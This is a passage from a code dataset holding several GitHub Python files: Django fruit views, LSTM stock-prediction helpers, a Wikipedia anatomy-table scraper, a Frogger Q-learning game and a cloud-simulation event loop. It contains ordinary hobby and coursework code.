instance=fruit)\n\n if form.is_valid():\n form.save()\n return redirect('dashboard')\n \n context = {\n 'form': form,\n 'profile': profile\n }\n\n return render(request, 'fruits/edit-fruit.html', context=context)\n\ndef delete_fruit(request, pk):\n profile = Profile.objects.first()\n fruit = Fruits.objects.get(pk=pk)\n\n if request.method == 'GET':\n form = FruitDeleteForm(instance=fruit)\n else:\n form = FruitDeleteForm(request.POST, instance=fruit)\n\n if form.is_valid():\n form.save()\n return redirect('dashboard')\n \n context = {\n 'form': form,\n 'profile': profile\n }\n\n return render(request, 'fruits/delete-fruit.html', context=context)","repo_name":"AlexDimov-04/Software-Engineering-SoftUni","sub_path":"Python Web - май 2023/Python Web Basics/Exams/Exam_Preps/regular_exam_python_web/regular_exam_python_web/fruits/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3969,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"71573911047","text":"import pandas as pd\nimport numpy as np\nfrom sklearn import preprocessing\nnp.random.seed(4)\nimport datetime\nimport os\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' # 2 = INFO and WARNING messages are not printed\nimport tensorflow as tf\n\nfrom keras.models import Model, load_model\nfrom keras.layers import Dense, Dropout, LSTM, Input, Activation, concatenate\nfrom keras import optimizers\ntf.random.set_seed(4)\n\ndef data_prep_new_lstm(data, n_past=50, n_future=5, include_ma = False):\n '''\n DESCRIPTION:\n Prepares data for input into an LTSM model. Transforms the data dataframe into sequential time step data depending on the\n specified values for n_past and n_future. \n\n INPUT:\n data - (dataframe) A data frame containing open, high, low, close and adjusted close stock prices for a specific stock as well as the\n volume of stocks traded. (Index of data frame must be date column)\n n_past - (int) The number of data points that will be used when predicting a stock price\n n_future - (int) The number of time steps into the future the model should be able to predict for\n include_ma - (bool) Should a moving average of n_past days be included as a feature\n\n OUTPUT:\n data_normal_hist - (array) Matrix of open, close, low, high and volume scaled values in sections of n_past size data groups\n (Dimensions: rows x n_past x features)\n data_normal_nextday - (array) Matrix of scaled values at index n_future away from n_past data groups (Dimensions: rows x 1)\n data_values_nextday - (array) Matrix of adjusted closing price values at index n_future away from n_past data groups (Dimensions: rows x 1)\n y_normalizer - (object) A minmaxscaler object to be used to convert scaled predicted values back to non-scaled values\n date_list - (list) A list of dates from the data frame\n data_normal_hist_future - (array) Data set to be used to predict future values with\n date_list_future - (array) Date list of future values\n tech_ind_ma_normal - (array) Normalised values of moving average of n_past days\n ''' \n \n #X-values: open, closing, high, low stock prices and volume of stocks traded to input into lstm model\n normalizer = preprocessing.MinMaxScaler(feature_range=(-1,1))\n normalized_data = normalizer.fit_transform(data.drop(['AdjClose'], axis=1))\n data_normal_hist = np.array([normalized_data[:, 0: 5][i-n_future-n_past : i-n_future].copy() for i in range(len(normalized_data)-1, n_past + n_future, -1)])[::-1]\n data_normal_hist_future = np.array([normalized_data[:, 0: 5][i-n_past : i].copy() for i in range(len(normalized_data)-1, len(normalized_data)-1-n_future, -1)])[::-1]\n \n #Dates to use for plotting the results of the model\n date_list = [data.index[i] for i in range(len(data)-1, n_past + n_future, -1)][::-1]\n date_list_future = []\n for i in range (1, n_future+1):\n date_list_future.append(date_list[-1]+datetime.timedelta(days=i))\n\n #Y-values: adjusted closing stock price\n data_values_nextday = np.array([data.AdjClose[i].copy() for i in range(len(data)-1, n_past + n_future, -1)])[::-1]\n data_values_nextday = np.expand_dims(data_values_nextday, -1) \n y_normalizer = preprocessing.MinMaxScaler(feature_range=(-1,1))\n y_normalizer.fit(data_values_nextday) \n data_normal_nextday = y_normalizer.fit_transform(data_values_nextday)\n \n #Check if a technical indicator of moving average for n_past days must be incorporated in the preprocessing step\n if include_ma:\n #Technical indicator feature, moving average of n_past days for closing price of stock\n tech_ind_ma_normal = np.array([np.mean(data_normal_hist[i][:,3]) for i in range (data_normal_hist.shape[0])])\n tech_ind_ma_normal = np.expand_dims(tech_ind_ma_normal, -1)\n tech_ind_ma_normal_future = np.array([np.mean(data_normal_hist_future[i][:,3]) for i in range(data_normal_hist_future.shape[0])])\n tech_ind_ma_normal_future = np.expand_dims(tech_ind_ma_normal_future, -1)\n return data_normal_hist, data_normal_nextday, data_values_nextday, y_normalizer, date_list, data_normal_hist_future, date_list_future, tech_ind_ma_normal, tech_ind_ma_normal_future \n \n return data_normal_hist, data_normal_nextday, data_values_nextday, y_normalizer, date_list, data_normal_hist_future, date_list_future \n\n\ndef test_train_split(test_split, data_normal_hist, data_values_nextday, data_normal_nextday, date_list, include_ma = False, tech_ind_ma_normal=0):\n '''\n DESCRIPTION:\n Splits a data set into training and testing sets.\n\n INPUT:\n test_split - (float) Percentage of data set to be part of training set (this is a decimal ie. 0.8)\n data_normal_hist - (array) Matrix of open, close, low, high and volume scaled values in sections of n_past size data groups\n (Dimensions: rows x n_past x features)\n data_values_nextday - (array) Matrix of adjusted closing price values at index n_future away from n_past data groups \n (Dimensions: rows x 1)\n data_normal_nextday - (array) Matrix of scaled values at index n_future away from n_past data groups (Dimensions: rows x 1)\n date_list - (list) List of all dates in the data set\n tech_ind_ma_normal - (array) An array of 50 day moving averages\n \n OUTPUT:\n data_normal_hist_train (array) - Training set matrix of open, close, low, high and volume scaled values in sections of n_past size data groups\n data_normal_nextday_train (array) - Training set matrix of scaled values at index n_future away from n_past data groups (Dimensions: rows x 1)\n data_normal_hist_test (array) - Testing set matrix of open, close, low, high and volume scaled values in sections of n_past size data groups\n data_normal_nextday_test (array) - Testing set matrix of scaled values at index n_future away from n_past data groups (Dimensions: rows x 1)\n data_values_nextday_test (array) - Test set adjusted closing price values at index n_future away from n_past data groups \n (Dimensions: rows x 1)\n date_list_train (array) - List of training data set dates\n date_list_test (array) - List of testing data set dates\n tech_ind_ma_normal_train (array) - An array of 50 day moving averages for training set\n tech_ind_ma_normal (array) - An array of 50 day moving averages for testing set\n ''' \n \n n = int(data_normal_hist.shape[0] * test_split)\n \n #Prepare training data\n data_normal_hist_train = data_normal_hist[: n]\n data_normal_nextday_train = data_normal_nextday[: n]\n data_values_nextday_train = data_values_nextday[:n]\n date_list_train = date_list[: n]\n \n #Prepare testing data\n data_normal_hist_test = data_normal_hist[n: ]\n data_normal_nextday_test = data_normal_nextday[n: ]\n data_values_nextday_test = data_values_nextday[n: ]\n date_list_test = date_list[n: ]\n \n #Check if Moving average is included for this test/train split\n if include_ma:\n tech_ind_ma_normal_test = tech_ind_ma_normal[n: ]\n tech_ind_ma_normal_train = tech_ind_ma_normal[: n]\n return data_normal_hist_train, data_normal_nextday_train, data_normal_hist_test, data_normal_nextday_test, data_values_nextday_test, date_list_train, date_list_test, tech_ind_ma_normal_train, tech_ind_ma_normal_test\n\n return data_normal_hist_train, data_normal_nextday_train, data_normal_hist_test, data_normal_nextday_test, data_values_nextday_test, date_list_train, date_list_test\n\ndef create_lstm_basic_model(n_past=50, learning_rate=0.0005):\n '''\n DESCRIPTION:\n Creates an LSTM model that considers n_past time steps when predicting a future value. This models uses a linear activation \n function\n\n INPUT:\n n_past - (int) Days to use when predicting a value\n learning_rate - (int) Learning rate to use for the model\n \n OUTPUT:\n model (object) - An LSTM model object\n ''' \n np.random.seed(4)\n tf.random.set_seed(4)\n lstm_input = Input(shape=(n_past, 5), name='lstm_input')\n x = LSTM(50, name='lstm_0')(lstm_input)\n x = Dropout(0.2, name='lstm_dropout_0')(x)\n x = Dense(64, name='dense_0')(x)\n x = Activation('sigmoid', name='sigmoid_0')(x)\n x = Dense(1, name='dense_1')(x)\n output = Activation('linear', name='linear_output')(x)\n model = Model(inputs=lstm_input, outputs=output)\n adam = optimizers.Adam(learning_rate)\n model.compile(optimizer=adam, loss='mse')\n return model\n\ndef create_lstm_TA_model(tech_ind_ma_normal, n_past=50, learning_rate=0.0005, neurons=50):\n '''\n DESCRIPTION:\n Creates an LSTM model that considers n_past time steps when predicting a future value. This models uses a linear activation \n function and uses a moving average technical indicator to train the model.\n\n INPUT:\n n_past - (int) Days to use when predicting a value\n learning_rate - (int) Learning rate to use for the model\n neurons - (int) Number of neurons to use for the model\n tech_ind_ma_normal - (array) Normalised values of moving average of n_past days\n \n OUTPUT:\n model (object) - An LSTM model object\n ''' \n np.random.seed(4)\n tf.random.set_seed(4)\n # define two sets of model inputs\n lstm_input = Input(shape=(n_past, 5), name='lstm_input')\n dense_input = Input(shape=(tech_ind_ma_normal.shape[1],), name='tech_input')\n\n # the first branch operates on the first input\n x = LSTM(neurons, name='lstm_0')(lstm_input)\n x = Dropout(0.2, name='lstm_dropout_0')(x)\n lstm_branch = Model(inputs=lstm_input, outputs=x)\n\n # the second branch opreates on the second input\n y = Dense(20, name='tech_dense_0')(dense_input)\n y = Activation(\"relu\", name='tech_relu_0')(y)\n y = Dropout(0.2, name='tech_dropout_0')(y)\n technical_indicators_branch = Model(inputs=dense_input, outputs=y)\n\n # combine the output of the two branches\n combined = concatenate([lstm_branch.output, technical_indicators_branch.output], name='concatenate')\n\n z = Dense(64, activation=\"sigmoid\", name='dense_pooling')(combined)\n z = Dense(1, activation=\"linear\", name='dense_out')(z)\n\n # the model will accept the inputs of the two branches and then output a single value\n model = Model(inputs=[lstm_branch.input, technical_indicators_branch.input], outputs=z)\n\n adam = optimizers.Adam(learning_rate)\n\n model.compile(loss='mean_squared_error', optimizer='adam') \n return model\n\n","repo_name":"dirklambrechts/UdacityCapstoneProject_StockPredictor","sub_path":"Stock_price_prediction_web_application/Model_data_prep.py","file_name":"Model_data_prep.py","file_ext":"py","file_size_in_byte":10447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"26671939116","text":"# -*- coding: utf-8 -*-\nfrom anatomy_tagging.models import Term\nfrom bs4 import BeautifulSoup\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\nfrom optparse import make_option\nimport copy\nimport json\nimport os\nimport wikipedia\n\n\nWIKI_PAGE_MUSCLES = 'List_of_muscles_of_the_human_body'\nWIKI_PAGE_FORAMINA = 'List_of_foramina_of_the_human_body'\n\n\nclass Command(BaseCommand):\n help = u\"\"\"Scrape info about terms from wikipedia\"\"\"\n\n option_list = BaseCommand.option_list + (\n make_option(\n '--delete',\n action='store_true',\n dest='delete',\n default=False,\n help='Delete images and paths at first',\n ),\n make_option(\n '--page',\n type=str,\n dest='page',\n default=WIKI_PAGE_MUSCLES,\n help='Name of the WIKI page'\n )\n )\n\n def handle(self, *args, **options):\n self.get_relations(options['page'])\n\n def get_relations(self, page_name, main_term_column_index=0):\n if page_name == WIKI_PAGE_FORAMINA:\n main_term_column_index = 2\n self.init_terms()\n json_name = os.path.join(settings.MEDIA_DIR, page_name + '.json')\n if os.path.isfile(json_name):\n with open(json_name, 'r') as f:\n raw_relations = json.load(f)\n return raw_relations\n\n page = wikipedia.page(page_name)\n soup = BeautifulSoup(page.html())\n tables = soup.findAll(\"table\", {\"class\": \"wikitable\"})\n raw_relations = []\n for table in tables:\n relations = self.process_table(table, main_term_column_index)\n raw_relations = raw_relations + relations\n\n with open(json_name, 'w') as f:\n json.dump(raw_relations, f)\n\n return copy.deepcopy(raw_relations)\n\n def init_terms(self):\n if hasattr(self, 'terms'):\n return\n terms = Term.objects.prepare_related().all()\n self.terms = {}\n for t in terms:\n for name in t.name_la.split(';') if t.name_la is not None else []:\n self.terms[name.lower()] = t\n for name in t.name_en.split(';') if t.name_en is not None else []:\n self.terms[name.lower()] = t\n\n def get_term_name(self, cell):\n return \" \".join([c.strip() for c in cell.findAll(text=True)]).strip()\n\n def get_term_from_cell(self, cell):\n term = None\n links = cell.findAll('a')\n if len(links) == 1:\n title = links[0].get('title', None)\n term = self.get_term_from_name(title)\n if term is not None:\n return term\n\n name = self.get_term_name(cell)\n term = self.get_term_from_name(name)\n return term\n\n def get_term_from_name(self, name):\n term = None\n if name is None:\n return None\n name = name.lower().strip()\n if name != \"\":\n term = self.terms.get(name, None)\n if term is None:\n term = self.terms.get(name.replace(\" muscle\", \"\"), None)\n return None if term is None else term.to_serializable()\n\n def process_table(self, table, main_term_column_index):\n relations = []\n header = table.find(\"tr\").findAll(\"th\")\n header = [h.find(text=True).strip() for h in header]\n for row in table.findAll(\"tr\")[1:]:\n cells = row.findAll(\"td\")\n if len(cells) == len(header):\n relations_dict = {}\n main_term = self.get_term_from_cell(cells[main_term_column_index])\n for h, c in zip(header, cells):\n term = self.get_term_from_cell(c)\n if term != main_term:\n relations_dict[h] = c\n relation = {\n 'type': h,\n 'term1': main_term,\n 'term2': term,\n 'text1': self.get_term_name(cells[main_term_column_index]),\n 'text2': self.get_term_name(c),\n }\n relations.append(relation)\n return relations\n","repo_name":"adaptive-learning/anatomy-tagging","sub_path":"anatomy_tagging/management/commands/scrape_wiki.py","file_name":"scrape_wiki.py","file_ext":"py","file_size_in_byte":4199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4247730585","text":"import math\nimport os\nimport pickle\nimport random\n\nimport numpy as np\nimport pygame\nimport matplotlib\nimport matplotlib.pyplot as plt\n\n# Données environnement\nFILE_QTABLE = 'qtable.dat'\nMAX_STEPS = 200\nCOOLING_RATE = 0.99\nCOOLING_RATE_DECAY = 0.9995\nALPHA = 0.1 # Learning Rate\nGAMMA = 1\nMAP_HEIGHT = 10\nMAP_WIDTH = 10\nMAX_SESSION = 1000\nEXPLORATION = 1\n# Reward\nDEATH_REWARD = -100\nWIN_REWARD = 200\nSTEP_FORWARD_REWARD = 2\nSTEP_TO_SIDE_REWARD = -1\nSTEP_TO_BACK_REWARD = -2\nSTAY_REWARD = -1\n# Positionnement Target et frog\nFROG_START_X = 240\nFROG_START_Y = 540\nFROG_START_MAP_X = int(FROG_START_X / 60)\nFROG_START_MAP_Y = int(FROG_START_Y / 60)\nTARGET_X = 240\nTARGET_Y = 0\n\nFROG_SPEED = 6\n# taille des rectangles\nFROG_WIDTH = 60\nFROG_HEIGHT = 60\nTARGET_WIDTH = 60\nTARGET_HEIGHT = 60\nCAR_WIDTH = 120\nCAR_HEIGHT = 60\n\nBASE_HEIGHT = 60\n# Liste des actions\nACTION_UP = 0\nACTION_DOWN = 1\nACTION_LEFT = 2\nACTION_RIGHT = 3\nACTION_STAY = 4\nACTIONS = [ACTION_UP, ACTION_DOWN, ACTION_LEFT, ACTION_RIGHT, ACTION_STAY]\n\n# Images\nFROG_IMAGE = pygame.image.load(os.path.join('textures', 'frog.png'))\nCAR_IMAGE = pygame.image.load(os.path.join('textures', 'car.png'))\nTARGET_IMAGE = pygame.image.load(os.path.join('textures', 'target.png'))\n# plot\nPLT_TRONC = 100\n\n\nclass Rectangle:\n\n def __init__(self, image, rect):\n self.__image = image\n self.__rect = rect\n\n @property\n def image(self):\n return self.__image\n\n @property\n def rect(self):\n return self.__rect\n\n\nclass Frog(Rectangle):\n def __init__(self, image, rect, speed):\n super(Frog, self).__init__(image, rect)\n self.__temp_pos_x = self.rect.x\n self.__temp_pos_y = self.rect.y\n self.__speed = speed\n self.__is_move_validated = False\n self.__have_jump = False\n self.__current_pos = (FROG_START_MAP_X, FROG_START_MAP_Y)\n self.__action = None\n\n def move(self, action):\n\n if self.__have_jump:\n self.__is_move_validated = False\n self.__temp_pos_x = self.rect.x\n self.__temp_pos_y = self.rect.y\n\n if action == ACTION_UP:\n if self.rect.y > self.__temp_pos_y - self.rect.h:\n self.rect.y -= self.__speed\n self.__have_jump = False\n if self.rect.y < 0:\n self.rect.y = 0\n self.__have_jump = True\n else:\n self.__have_jump = True\n if not self.__is_move_validated:\n self.__current_pos = (self.__current_pos[0], self.__current_pos[1] - 1)\n self.__is_move_validated = True\n elif action == ACTION_RIGHT:\n if self.rect.x < self.__temp_pos_x + self.rect.w:\n self.rect.x += self.__speed\n self.__have_jump = False\n if self.rect.x > 540:\n self.rect.x = 540\n self.__have_jump = True\n else:\n self.__have_jump = True\n if not self.__is_move_validated:\n self.__current_pos = (self.__current_pos[0] + 1, self.__current_pos[1])\n self.__is_move_validated = True\n\n elif action == ACTION_LEFT:\n if self.rect.x > self.__temp_pos_x - self.rect.w:\n self.rect.x -= self.__speed\n self.__have_jump = False\n if self.rect.x < 0:\n self.rect.x = 0\n self.__have_jump = True\n else:\n self.__have_jump = True\n if not self.__is_move_validated:\n self.__current_pos = (self.__current_pos[0] - 1, self.__current_pos[1])\n self.__is_move_validated = True\n\n elif action == ACTION_DOWN:\n if self.rect.y < self.__temp_pos_y + self.rect.h:\n if self.rect.y > 540:\n self.rect.y = 540\n self.__have_jump = True\n else:\n self.__have_jump = True\n if not self.__is_move_validated:\n self.__current_pos = (self.__current_pos[0], self.__current_pos[1] + 1)\n self.__is_move_validated = True\n\n elif action == ACTION_STAY:\n self.__have_jump = True\n if not self.__is_move_validated:\n self.__is_move_validated = True\n\n @property\n def have_jump(self):\n return self.__have_jump\n\n @property\n def current_pos(self):\n return self.__current_pos\n\n @have_jump.setter\n def have_jump(self, value):\n self.__have_jump = value\n\n @current_pos.setter\n def current_pos(self, value):\n self.__current_pos = value\n\n\nclass Car(Rectangle):\n def __init__(self, image, rect):\n super(Car, self).__init__(image, rect)\n\n\nclass Target(Rectangle):\n def __init__(self, image, rect):\n super(Target, self).__init__(image, rect)\n\n\nclass Environment:\n\n def __init__(self, max_steps=MAX_STEPS, is_q_table=True, cooling_rate=COOLING_RATE, alpha=ALPHA, gamma=GAMMA, max_session=MAX_SESSION, exploration=EXPLORATION):\n self.__windows = pygame.display.set_mode((600, 600))\n self.__frog = None\n self.__target = None\n self.__max_next_q = None\n self.__list_car = []\n self.__collision_map = {(0, 0): 0}\n self.__max_steps = max_steps\n self.__q_table = None\n self.update_q_table(is_q_table)\n self.__reward = 0\n self.__current_state = None\n self.__next_state = None\n self.__cooling_rate = cooling_rate\n self.__max_q_arg = None\n self.__action = None\n self.__exploration = exploration\n self.__current_state = None\n self.__alpha = alpha\n self.__gamma = gamma\n self.__session_reward = 0\n self.__max_session = max_session\n self.__list_session_reward = []\n self.__my_font = None\n self.__is_able_to_die = True\n self.init()\n\n def init(self):\n self.init_frog()\n self.init_target()\n self.init_list_car()\n self.init_font()\n self.init_qtable()\n self.update_windows(0, 0)\n self.init_collision_map()\n\n def start(self, is_should_save= True):\n self.run_session(True)\n\n def init_font(self):\n pygame.font.init()\n self.__my_font = pygame.font.SysFont('Comic Sans MS', 30)\n\n def init_frog(self):\n self.__frog = Frog(FROG_IMAGE, pygame.Rect(FROG_START_X, FROG_START_Y, FROG_WIDTH, FROG_HEIGHT), FROG_SPEED)\n\n def init_target(self):\n self.__target = Target(TARGET_IMAGE, pygame.Rect(TARGET_X, TARGET_Y, TARGET_WIDTH, TARGET_HEIGHT))\n\n def init_list_car(self):\n for i in range(8):\n self.__list_car.append(\n Car(CAR_IMAGE, pygame.Rect(random.uniform(0, 540), BASE_HEIGHT * i + 60, CAR_WIDTH, CAR_HEIGHT)))\n\n def update_windows(self, session, reward):\n self.__windows.fill((0, 0, 0))\n self.__windows.blit(self.__frog.image, (self.__frog.rect.x, self.__frog.rect.y))\n self.__windows.blit(self.__target.image, (self.__target.rect.x, self.__target.rect.y))\n for i in range(len(self.__list_car)):\n if i % 2:\n self.__windows.blit(self.__list_car[i].image, (self.__list_car[i].rect.x, self.__list_car[i].rect.y))\n else:\n self.__windows.blit(pygame.transform.rotate(self.__list_car[i].image, 180),\n (self.__list_car[i].rect.x, self.__list_car[i].rect.y))\n\n text_surface = self.__my_font.render(f\"session : {session}, reward : {reward}\", False, (255, 255, 255))\n self.__windows.blit(text_surface, (0, 0))\n pygame.display.update()\n\n def init_collision_map(self):\n for j in range(10):\n for i in range(10):\n self.__collision_map[(i, j)] = 0\n\n def move_cars(self):\n for i in range(len(self.__list_car)):\n if i % 2:\n self.__list_car[i].rect.x += 3\n if self.__list_car[i].rect.x > 600:\n self.__list_car[i].rect.x = -self.__list_car[i].rect.w\n else:\n self.__list_car[i].rect.x -= 3\n if self.__list_car[i].rect.x < -self.__list_car[i].rect.w:\n self.__list_car[i].rect.x = 600\n\n def update_car_collision(self):\n for car in self.__list_car:\n if car.rect.x >= 0 and car.rect.w <= 600:\n pos_x = car.rect.x // 60\n pos_y = car.rect.y // 60\n car_hit_box = CAR_WIDTH // 60\n self.update_collision_map(pos_x, pos_y, car_hit_box)\n\n def update_collision_map(self, pos_x, pos_y, car_hit_box):\n if pos_y == 2:\n pos_x -= 1\n\n for i in range(10):\n self.__collision_map[(i, pos_y)] = 0\n\n for i in range(10):\n if i >= pos_x and i <= pos_x + car_hit_box:\n self.__collision_map[(i, pos_y)] = 1\n\n def check_collision(self):\n for car in self.__list_car:\n if self.__frog.rect.colliderect(car.rect):\n return True, False\n if self.__frog.rect.colliderect(self.__target.rect):\n return False, True\n return False, False\n\n def update_q_table(self, is_q_table):\n if is_q_table:\n if os.path.exists(FILE_QTABLE):\n old_table = open(FILE_QTABLE, 'rb')\n self.__q_table = pickle.load(old_table)\n else:\n pass\n else:\n pass\n\n def init_qtable(self):\n self.__q_table = {}\n # for state in range(MAP_HEIGHT * MAP_WIDTH):\n # self.__q_table[state] = {}\n # for action in ACTIONS:\n # self.__q_table[state][action] = 0\n for action_up in range(5):\n for action_right in range(5):\n for action_left in range(5):\n for action_down in range(5):\n for action_stay in range(5):\n for current_y in range(10):\n self.__q_table[action_up, action_right, action_left, action_down, action_stay, current_y] = [math.floor(random.uniform(0,5)) for i in range(5)]\n\n def save(self):\n with open(FILE_QTABLE, 'wb') as file:\n pickle.dump(self.__q_table, file)\n\n def update_state(self, is_next):\n\n state_stay = self.__collision_map[(self.__frog.current_pos[0], self.__frog.current_pos[1])]\n\n if self.__frog.current_pos[1] > 0:\n state_up = self.__collision_map[(self.__frog.current_pos[0], self.__frog.current_pos[1] - 1)]\n else:\n state_up = 2\n\n if self.__frog.current_pos[1] < 9:\n state_down = self.__collision_map[(self.__frog.current_pos[0], self.__frog.current_pos[1] + 1)]\n else:\n state_down = 2\n\n if self.__frog.current_pos[0] < 9:\n state_right = self.__collision_map[(self.__frog.current_pos[0] + 1, self.__frog.current_pos[1])]\n else:\n state_right = 2\n\n if self.__frog.current_pos[0] > 0:\n state_left = self.__collision_map[(self.__frog.current_pos[0] - 1, self.__frog.current_pos[1])]\n else:\n state_left = 2\n\n if not is_next:\n self.__current_state = (state_up, state_down, state_right, state_left, state_stay, self.__frog.current_pos[1])\n if np.random.uniform(0,1) < self.__exploration:\n self.__exploration *= self.__cooling_rate\n self.__max_q_arg = np.argmax(self.__q_table[self.__current_state])\n self.__action = self.__max_q_arg + 1\n else:\n self.__action = np.random.randint(1, 6)\n\n if self.__action == ACTION_UP and state_up == 2:\n return True\n if self.__action == ACTION_RIGHT and state_right == 2:\n return True\n if self.__action == ACTION_LEFT and state_left == 2:\n return True\n if self.__action == ACTION_DOWN and state_down == 2:\n return True\n\n return False\n else:\n self.__next_state = (state_up, state_down, state_right, state_left, state_stay, self.__frog.current_pos[1])\n return False\n\n def run_game(self, session):\n is_loose_game = False\n is_won_game = False\n step = 0\n self.__action = ACTION_STAY\n is_out_of_map = False\n new_q = None\n\n while step < MAX_STEPS:\n if is_out_of_map:\n self.__frog.have_jump = True\n\n self.move_cars()\n self.update_car_collision()\n\n if self.__frog.have_jump:\n step += 1\n\n is_out_of_map = self.update_state(False)\n\n if not is_out_of_map:\n self.__frog.move(self.__action)\n is_loose_game, is_won_game = self.check_collision()\n\n if is_loose_game or is_out_of_map:\n self.__reward = DEATH_REWARD\n elif is_won_game:\n self.__reward = WIN_REWARD\n else:\n if self.__action == ACTION_LEFT or self.__action == ACTION_RIGHT:\n self.__reward = STEP_TO_SIDE_REWARD\n elif self.__action == 1:\n self.__reward = STEP_FORWARD_REWARD\n elif self.__action == 4:\n self.__reward = STEP_TO_BACK_REWARD\n else:\n self.__reward = STAY_REWARD\n\n if is_loose_game:\n new_q = DEATH_REWARD\n elif is_won_game:\n new_q = WIN_REWARD\n else:\n is_out_of_map = self.update_state(True)\n\n self.__max_next_q = max(self.__q_table[self.__next_state])\n # new_q = self.__alpha * (\n # self.__reward + self.__gamma * self.__max_next_q - self.__q_table[self.__current_state][self.__action])\n\n new_q = self.__q_table[self.__current_state][self.__action - 1] + self.__alpha * (self.__reward + self.__max_next_q - self.__q_table[self.__current_state][self.__action - 1])\n self.__q_table[self.__current_state][self.__action - 1] = new_q\n\n if (self.__reward == WIN_REWARD or self.__reward == DEATH_REWARD or step == self.__max_steps) and self.__is_able_to_die:\n self.__frog.rect.x = 240\n self.__frog.rect.y = 540\n self.__frog.current_pos = (4, 9)\n self.__session_reward += self.__reward\n break\n else:\n self.__frog.move(self.__action)\n self.check_collision()\n\n self.__session_reward += self.__reward\n self.update_windows(session, self.__reward)\n print(f\"episode: {session}, cooling_rate: {self.__cooling_rate}, reward: {self.__session_reward}, exploration: {self.__exploration}\")\n self.__list_session_reward.append(self.__session_reward)\n self.__session_reward = 0\n self.__cooling_rate *= COOLING_RATE_DECAY\n\n def run_session(self, is_should_save= True):\n for session in range(self.__max_session):\n self.run_game(session)\n\n rewardsAverage = np.convolve(self.__list_session_reward, np.ones((PLT_TRONC,)) / PLT_TRONC, mode=\"valid\")\n plt.plot([i for i in range(len(rewardsAverage))], rewardsAverage)\n plt.ylabel(f\"reward {PLT_TRONC}ma\")\n plt.xlabel(\"Session #\")\n plt.show()\n\n if is_should_save:\n self.save()\n\n\nif __name__ == \"__main__\":\n env = Environment()\n","repo_name":"ThibaudBr/frogger_ia","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27754303844","text":"from __future__ import annotations\nfrom ..events import Event\nfrom ..utils import MinHeap\nfrom ..entity import SimulationEntity\nfrom enum import Enum\nimport threading\nimport numpy as np\nfrom typing import TYPE_CHECKING\nif TYPE_CHECKING:\n from ..datacenters import Datacenter\n from ..listeners import EventListener, CircularClockListener\n\n\nclass Simulator(SimulationEntity):\n class State(Enum):\n \"\"\"The simulation is initailized but not running yet\"\"\"\n INITIALIZED = 0\n \"\"\"The simulation is running\"\"\"\n RUNNING = 1\n \"\"\"The simulation is paused\"\"\"\n PAUSED = 2\n \"\"\"The simulation end normaly or the terminate time arrives\"\"\"\n\n def event_comparator(event_a: Event, event_b: Event) -> bool:\n # The event with small start delay goes first\n if event_a.get_start_time() < event_b.get_start_time():\n return True\n elif event_a.get_start_time() > event_b.get_start_time():\n return False\n else:\n # If 2 or more events occur at the same time,\n # event with higher priority (smaller priority value, see details in Event class)\n # go first\n if event_a.get_event_priority() < event_b.get_event_priority():\n return True\n elif event_a.get_event_priority() > event_b.get_event_priority():\n return False\n else:\n # If 2 events with the same priority occur at the same time,\n # their order doesn't matter\n return False\n\n def __init__(self) -> None:\n \"\"\"\n A simulator is the core of cloud simulation, \n which maintains an event priority queue and\n a global clock to perform event-driven simulation.\n The events in event queue are ordered by start time.\n Event with smallest start time comes to the top of heap.\n A simulator is also an event dispatcher, \n which accepts scheduled event from simulation entities \n and act properly when event occurs\n \"\"\"\n self.event_queue = MinHeap(Simulator.event_comparator)\n self.global_clock_prev = 0.0\n self.global_clock = 0.0\n self.event_listener_list = []\n self.circular_clock_listener_list = []\n self.state = Simulator.State.INITIALIZED\n self.datacenter = None\n self.is_terminate_time_set = False\n self.event_queue.push(Event(source=None, target=self, event_type=Event.TYPE.SIMULATION_TERMINATE, extra_data={\"simulator\": self}, start_time=np.finfo(np.float64).max))\n\n def get_global_clock(self) -> float:\n return self.global_clock\n\n def set_termination_time(self, terimination_time: float):\n self.is_terminate_time_set = True\n self.event_queue.push(Event(source=None, target=self, event_type=Event.TYPE.SIMULATION_TERMINATE, extra_data={\"simulator\": self}, start_time=terimination_time))\n\n def submit(self, event: Event) -> None:\n self.event_queue.push(event)\n\n def process(self, event: Event):\n for event_listener in self.event_listener_list:\n event_listener.update(event, self)\n if event.get_event_type() == Event.TYPE.SIMULATION_TERMINATE:\n self.process_simulation_terminate(event)\n elif event.get_event_type() == Event.TYPE.SIMULATION_PAUSE:\n self.process_simulation_pause(event)\n elif event.get_event_type() == Event.TYPE.CIRCULAR_CLOCK_EVENT:\n for circular_clock_listener in self.circular_clock_listener_list:\n circular_clock_listener.update(self)\n else:\n self.send(event)\n self.global_clock_prev = self.global_clock\n\n def process_simulation_terminate(self, event: Event):\n if not self.is_terminate_time_set:\n self.global_clock = self.global_clock_prev\n self.datacenter.process_simulation_terminate(event)\n\n def process_simulation_pause(self, event: Event):\n self.state = Simulator.State.PAUSED\n\n def send(self, event: Event) -> None:\n event.get_target().process(event)\n\n def run_util_pause_or_terminate(self) -> None:\n self.state = Simulator.State.RUNNING\n while self.state == Simulator.State.RUNNING and not self.event_queue.is_empty():\n event = self.event_queue.pop()\n self.global_clock = event.get_start_time()\n self.process(event)\n\n def add_event_listener(self, listener: EventListener):\n self.event_listener_list.append(listener)\n\n def add_circular_clock_listener(self, listener: CircularClockListener):\n self.circular_clock_listener_list.append(listener)\n self.event_queue.push(Event(\n source=None, target=self, event_type=Event.TYPE.CIRCULAR_CLOCK_EVENT, extra_data=None, start_time=0.0))\n\n def get_state(self) -> State:\n return self.state\n\n def set_state(self, state: State):\n self.state = state\n\n def set_datacenter(self, datacenter: Datacenter):\n self.datacenter = datacenter\n \n def get_datacenter(self)->Datacenter:\n return self.datacenter\n","repo_name":"AndrewLawrence80/pycloudsim","sub_path":"pycloudsim/simulation/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":5097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5411680323","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# 